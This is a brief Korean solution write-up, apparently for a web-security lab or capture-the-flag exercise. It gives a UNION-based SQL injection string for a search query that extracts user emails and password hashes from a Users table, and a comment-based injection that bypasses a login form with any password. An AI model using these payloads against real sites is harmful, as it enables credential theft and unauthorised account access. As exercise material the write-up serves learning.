풀이

검색 부분의 쿼리에 '))+UNION+SELECT+id,email,password,4,5,6,7,8,9+FROM+Users+--+ 를 넣어서 사용자의 정보를 알아냄

Untitled

[email protected]’-- 를 로그인 페이지의 아이디에 넣고 비밀번호는 아무거나 넣으면 성공!

Untitled